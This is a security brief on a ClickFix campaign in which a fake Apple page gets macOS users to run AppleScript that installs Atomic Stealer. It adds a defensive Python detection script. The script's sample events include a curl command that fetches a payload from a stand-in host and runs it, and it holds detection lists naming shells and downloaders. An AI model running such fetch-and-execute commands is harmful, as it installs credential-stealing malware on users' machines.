ClickFix Campaign Delivers macOS Malware via Fake Apple Page, Compromising Keychain and Financial Data
What Happened — Attackers hosted a counterfeit Apple‑styled webpage that coaxed macOS users into clicking an “Execute” button. The page opened Script Editor with a pre‑loaded AppleScript that, when saved and run, silently fetched and executed a variant of the Atomic Stealer (AMOS) malware.
Why It Matters for TPRM —
- The technique bypasses macOS’s new Terminal‑command‑scanning feature by leveraging Script Editor, a default macOS app.
- Atomic Stealer harvests Keychain credentials, browser autofill data, cookies, and crypto wallet files, exposing downstream vendors and SaaS services that trust these credentials.
- The campaign demonstrates a resurgence of ClickFix‑style social engineering, now targeting macOS users at scale.
Who Is Affected — Technology SaaS providers, financial services firms, and any organization whose employees use macOS devices for privileged access.
Recommended Actions —
- Review and harden macOS endpoint policies to block Script Editor launches from web browsers.
- Deploy EDR (or EDR‑compatible) detections for unauthorized AppleScript execution, including Script Editor or osascript processes that spawn shells or downloaders.
- Conduct user awareness training focused on ClickFix and other copy‑paste‑based attacks.
- Verify that third‑party vendors enforce MFA and least‑privilege for accounts that could be harvested from macOS Keychain.
Technical Notes — Attack vector: phishing‑style web page → Script Editor → AppleScript → download of Atomic Stealer. No known CVE; the malware steals system info, Keychain passwords, browser autofill, credit‑card data, and cryptocurrency wallet files. Source: Help Net Security
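As an added illustration of the detection the recommended actions call for (example code written for this brief, not code from the original page or from Help Net Security), the script below applies two process‑lineage rules to a constructed batch of macOS process events matching the attack vector above: an AppleScript host launched directly by a browser, and a shell or downloader running beneath an AppleScript host. The event schema, the process names and the parent‑child relationships in the sample are assumptions.

```python
# Constructed sample process-creation events in an assumed EDR-style schema
# (pid, ppid, name, cmd); not a specific vendor's format.
SAMPLE_EVENTS = [
    {"pid": 501, "ppid": 1,   "name": "Safari", "cmd": "/Applications/Safari.app/Contents/MacOS/Safari"},
    {"pid": 612, "ppid": 501, "name": "Script Editor", "cmd": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"},
    {"pid": 640, "ppid": 612, "name": "sh", "cmd": "sh -c curl -fsSL http://lure.invalid/pkg -o /tmp/pkg && chmod +x /tmp/pkg && /tmp/pkg"},
    {"pid": 641, "ppid": 640, "name": "curl", "cmd": "curl -fsSL http://lure.invalid/pkg -o /tmp/pkg"},
    {"pid": 700, "ppid": 1,   "name": "Finder", "cmd": "/System/Library/CoreServices/Finder.app/Contents/MacOS/Finder"},
    {"pid": 701, "ppid": 700, "name": "Script Editor", "cmd": "/System/Applications/Utilities/Script Editor.app/Contents/MacOS/Script Editor"},
    {"pid": 702, "ppid": 701, "name": "osascript", "cmd": "osascript /Users/dev/tidy_desktop.scpt"},
]

BROWSERS = {"Safari", "Google Chrome", "firefox", "Microsoft Edge", "Brave Browser", "Arc"}
APPLESCRIPT_HOSTS = {"Script Editor", "osascript"}
DOWNLOADERS = {"curl", "wget"}
SHELLS = {"sh", "bash", "zsh"}


def ancestry(pid, by_pid):
    """Return process names from pid up to the root, nearest first."""
    chain = []
    while pid in by_pid:
        chain.append(by_pid[pid]["name"])
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events):
    """Return (rule, pid, chain) tuples for events matching the ClickFix chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        chain = ancestry(e["pid"], by_pid)
        parent = by_pid.get(e["ppid"])
        # Rule 1: an AppleScript host started directly by a browser (the lure page
        # opening Script Editor). Assumes telemetry reports the browser as parent;
        # on real systems Launch Services may be the parent, so prefer a
        # "responsible process" field when the sensor provides one.
        if e["name"] in APPLESCRIPT_HOSTS and parent and parent["name"] in BROWSERS:
            alerts.append(("browser_launched_applescript_host", e["pid"], chain))
        # Rule 2: a shell or downloader running anywhere beneath an AppleScript
        # host, i.e. the script reaching out to fetch and run a payload.
        if e["name"] in DOWNLOADERS | SHELLS and any(n in APPLESCRIPT_HOSTS for n in chain[1:]):
            alerts.append(("applescript_host_spawned_downloader", e["pid"], chain))
    return alerts


if __name__ == "__main__":
    for rule, pid, chain in detect(SAMPLE_EVENTS):
        print(f"{rule}: pid={pid} chain={' <- '.join(chain)}")
```

The benign Finder → Script Editor → osascript lineage in the sample produces no alert, so the rules key on the browser origin and the download step rather than on Script Editor use alone.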